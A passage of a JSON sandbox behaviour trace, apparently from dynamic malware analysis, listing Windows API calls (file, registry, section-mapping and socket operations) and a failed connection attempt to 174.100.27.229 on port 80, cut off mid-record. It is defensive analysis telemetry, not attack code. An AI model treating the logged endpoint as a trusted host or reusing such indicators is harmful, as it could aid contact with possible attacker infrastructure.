true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004d0" + } + ], + "repeated": 0, + "id": 1217 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b86a2", + "parentcaller": "0x756b82a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 1218 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77041fb0", + "parentcaller": "0x77028de8", + "category": "registry", + "api": "NtOpenKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + } + ], + "repeated": 0, + "id": 1219 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7702934b", + "parentcaller": "0x770297b2", + "category": "filesystem", + "api": "NtOpenFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00100001", + "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\es-ES\\wshqos.dll.mui" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 1220 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x770293dc", + "parentcaller": "0x770297b2", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004b8" + }, + { + "name": "DesiredAccess", + "value": "0x00100001", + "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\sysnative\\es-ES\\wshqos.dll.mui" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 1221 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x770297fc", + "parentcaller": "0x770292de", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004d0" + }, + { + "name": "DesiredAccess", + "value": "0x000f0005", + "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 1222 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77029824", + "parentcaller": "0x770292de", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004d0" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05950000" + }, + { + "name": "SectionOffset", + "value": "0x0557d918" + }, + { + "name": "ViewSize", + "value": "0x00001000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1223 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77029834", + "parentcaller": "0x770292de", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004d0" + } + ], + "repeated": 0, + "id": 1224 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7704a4ca", + "parentcaller": "0x7704a400", + "category": "process", + "api": "NtUnmapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05950000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + } + ], + "repeated": 0, + "id": 1225 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7704a4d8", + "parentcaller": "0x7704a400", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 1226 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b697c", + "parentcaller": "0x7553904d", + "category": "process", + "api": "NtUnmapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05940000" + }, + { + "name": "RegionSize", + "value": "0x00007000" + } + ], + "repeated": 0, + "id": 1227 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7703540b", + "parentcaller": "0x756b854e", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wshqos.dll" + } + ], + "repeated": 0, + "id": 1228 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b6fdb", + "parentcaller": "0x756b6ade", + "category": "filesystem", + "api": "NtCreateFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004b8" + }, + { + "name": "DesiredAccess", + "value": "0x80100080", + "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wshqos.dll" + }, + { + "name": "CreateDisposition", + "value": "1", + "pretty_value": "FILE_OPEN" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + }, + { + "name": "FileAttributes", + "value": "0x00000000" + }, + { + "name": "ExistedBefore", + "value": "yes" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1229 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b85fa", + "parentcaller": "0x756b82a7", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004d0" + }, + { + "name": "DesiredAccess", + "value": "0x00000005", + "pretty_value": "SECTION_QUERY|SECTION_MAP_READ" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 1230 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8643", + "parentcaller": "0x756b82a7", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x40000003", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004d0" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05940000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x00007000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1231 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b869b", + "parentcaller": "0x756b82a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004d0" + } + ], + "repeated": 0, + "id": 1232 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b86a2", + "parentcaller": "0x756b82a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 1233 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77041fb0", + "parentcaller": "0x77028de8", + "category": "registry", + "api": "NtOpenKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + } + ], + "repeated": 0, + "id": 1234 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7702934b", + "parentcaller": "0x770297b2", + "category": "filesystem", + "api": "NtOpenFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00100001", + "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\es-ES\\wshqos.dll.mui" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 1235 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x770293dc", + "parentcaller": "0x770297b2", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004b8" + }, + { + "name": "DesiredAccess", + "value": "0x00100001", + "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\sysnative\\es-ES\\wshqos.dll.mui" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 1236 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x770297fc", + "parentcaller": "0x770292de", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004d0" + }, + { + "name": "DesiredAccess", + "value": "0x000f0005", + "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 1237 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77029824", + "parentcaller": "0x770292de", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004d0" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05950000" + }, + { + "name": "SectionOffset", + "value": "0x0557d918" + }, + { + "name": "ViewSize", + "value": "0x00001000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1238 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77029834", + "parentcaller": "0x770292de", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004d0" + } + ], + "repeated": 0, + "id": 1239 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7704a4ca", + "parentcaller": "0x7704a400", + "category": "process", + "api": "NtUnmapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05950000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + } + ], + "repeated": 0, + "id": 1240 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7704a4d8", + "parentcaller": "0x7704a400", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 1241 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b697c", + "parentcaller": "0x7553904d", + "category": "process", + "api": "NtUnmapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05940000" + }, + { + "name": "RegionSize", + "value": "0x00007000" + } + ], + "repeated": 0, + "id": 1242 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7703540b", + "parentcaller": "0x756b854e", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wshqos.dll" + } + ], + "repeated": 0, + "id": 1243 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b6fdb", + "parentcaller": "0x756b6ade", + "category": "filesystem", + "api": "NtCreateFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004b8" + }, + { + "name": "DesiredAccess", + "value": "0x80100080", + "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wshqos.dll" + }, + { + "name": "CreateDisposition", + "value": "1", + "pretty_value": "FILE_OPEN" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + }, + { + "name": "FileAttributes", + "value": "0x00000000" + }, + { + "name": "ExistedBefore", + "value": "yes" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1244 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b85fa", + "parentcaller": "0x756b82a7", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004d0" + }, + { + "name": "DesiredAccess", + "value": "0x00000005", + "pretty_value": "SECTION_QUERY|SECTION_MAP_READ" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 1245 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8643", + "parentcaller": "0x756b82a7", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x40000003", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004d0" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05940000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x00007000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1246 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b869b", + "parentcaller": "0x756b82a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004d0" + } + ], + "repeated": 0, + "id": 1247 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b86a2", + "parentcaller": "0x756b82a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 1248 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77041fb0", + "parentcaller": "0x77028de8", + "category": "registry", + "api": "NtOpenKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + } + ], + "repeated": 0, + "id": 1249 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7702934b", + "parentcaller": "0x770297b2", + "category": "filesystem", + "api": "NtOpenFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00100001", + "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\es-ES\\wshqos.dll.mui" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 1250 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x770293dc", + "parentcaller": "0x770297b2", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004b8" + }, + { + "name": "DesiredAccess", + "value": "0x00100001", + "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\sysnative\\es-ES\\wshqos.dll.mui" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 1251 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x770297fc", + "parentcaller": "0x770292de", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004d0" + }, + { + "name": "DesiredAccess", + "value": "0x000f0005", + "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 1252 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77029824", + "parentcaller": "0x770292de", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004d0" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05950000" + }, + { + "name": "SectionOffset", + "value": "0x0557d918" + }, + { + "name": "ViewSize", + "value": "0x00001000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1253 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77029834", + "parentcaller": "0x770292de", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004d0" + } + ], + "repeated": 0, + "id": 1254 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7704a4ca", + "parentcaller": "0x7704a400", + "category": "process", + "api": "NtUnmapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05950000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + } + ], + "repeated": 0, + "id": 1255 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7704a4d8", + "parentcaller": "0x7704a400", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 1256 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b697c", + "parentcaller": "0x7553904d", + "category": "process", + "api": "NtUnmapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05940000" + }, + { + "name": "RegionSize", + "value": "0x00007000" + } + ], + "repeated": 0, + "id": 1257 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x76112466", + "parentcaller": "0x7337e84b", + "category": "filesystem", + "api": "NtSetInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000046c" + }, + { + "name": "HandleName", + "value": "\\Device\\Afd" + }, + { + "name": "FileInformationClass", + "value": "41", + "pretty_value": "FileIoStatusBlockRangeInformation" + }, + { + "name": "FileInformation", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1258 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7705727f", + "parentcaller": "0x77057096", + "category": "filesystem", + "api": "NtSetInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000046c" + }, + { + "name": "HandleName", + "value": "\\Device\\Afd" + }, + { + "name": "FileInformationClass", + "value": "30", + "pretty_value": "FileCompletionInformation" + }, + { + "name": "FileInformation", + "value": "T\\x00\\x00\\x008\\xaa*\\x05" + } + ], + "repeated": 0, + "id": 1259 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7337e17b", + "parentcaller": "0x7337e077", + "category": "network", + "api": "bind", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1132" + }, + { + "name": "ip", + "value": "0.0.0.0" + }, + { + "name": "port", + "value": "0" + } + ], + "repeated": 0, + "id": 1260 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x6db9ac5d", + "parentcaller": "0x7554234d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000046c" + }, + { + "name": "IoControlCode", + "value": "0x0001202f", + "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" + }, + { + "name": "InputBuffer", + "value": "" + }, + { + "name": "OutputBuffer", + "value": "\\x02\\x00\\xc3i\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1261 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7337e1b7", + "parentcaller": "0x7337e077", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1132" + }, + { + "name": "level", + "value": "0x00000006" + }, + { + "name": "optname", + "value": "0x00000001" + }, + { + "name": "optval", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1262 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x6db8a714", + "parentcaller": "0x7553f4f1", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000046c" + }, + { + "name": "IoControlCode", + "value": "0x000120bf", + "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" + }, + { + "name": "InputBuffer", + "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xe3\\xf3W\\x05\\x01\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 1263 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x6db8a714", + "parentcaller": "0x7553f4f1", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000046c" + }, + { + "name": "IoControlCode", + "value": "0x000120bf", + "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" + }, + { + "name": "InputBuffer", + "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00\\x88\\xf3W\\x05\\x08\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 1264 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7337e233", + "parentcaller": "0x7337e077", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1132" + }, + { + "name": "level", + "value": "0x0000ffff" + }, + { + "name": "optname", + "value": "0x00001002" + }, + { + "name": "optval", + "value": "\\x00\\x00\\x04\\x00" + } + ], + "repeated": 0, + "id": 1265 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x7337dc91", + "parentcaller": "0x7337db66", + "category": "network", + "api": "ConnectEx", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1132" + }, + { + "name": "SendBuffer", + "value": "" + }, + { + "name": "ip", + "value": "174.100.27.229" + }, + { + "name": "port", + "value": "80" + } + ], + "repeated": 0, + "id": 1266 + }, + { + "timestamp": "2025-03-07 22:33:25,750", + "thread_id": "6332", + "caller": "0x770937a8", + "parentcaller": "0x770551e4", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004c4" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05940000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x00001000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1267 + }, + { + "timestamp": "2025-03-07 22:33:25,750", + "thread_id": "6332", + "caller": "0x7705521f", + "parentcaller": "0x770d9cfd", + "category": "process", + "api": "NtUnmapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x001c0000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + } + ], + "repeated": 0, + "id": 1268 + }, + { + "timestamp": "2025-03-07 22:33:25,750", + "thread_id": "6332", + "caller": "0x7705523f", + "parentcaller": "0x770d9cfd", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004c4" + } + ], + "repeated": 0, + "id": 1269 + }, + { + "timestamp": "2025-03-07 22:33:38,704", + "thread_id": "8036", + "caller": "0x756c7924", + "parentcaller": "0x7511c105", + "category": "system", + "api": "NtDuplicateObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SourceProcessHandle", + "value": "0xffffffff" + }, + { + "name": "SourceHandle", + "value": "0xfffffffe" + }, + { + "name": "TargetProcessHandle", + "value": "0xffffffff" + }, + { + "name": "TargetHandle", + "value": "0x000004c8" + }, + { + "name": "Options", + "value": "0x00000002" + } + ], + "repeated": 0, + "id": 1270 + }, + { + "timestamp": "2025-03-07 22:33:47,454", + "thread_id": "6332", + "caller": "0x7335afe3", + "parentcaller": "0x756dd613", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 3, + "id": 1271 + }, + { + "timestamp": "2025-03-07 22:33:47,454", + "thread_id": "6332", + "caller": "0x73389bd2", + "parentcaller": "0x7332eeb2", + "category": "network", + "api": "closesocket", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1132" + } + ], + "repeated": 0, + "id": 1272 + }, + { + "timestamp": "2025-03-07 22:33:47,454", + "thread_id": "6332", + "caller": "0x733cc064", + "parentcaller": "0x7337a91d", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 5, + "id": 1273 + }, + { + "timestamp": "2025-03-07 22:33:47,485", + "thread_id": "9440", + "caller": "0x03ce22b8", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "HttpSendRequestW", + "status": 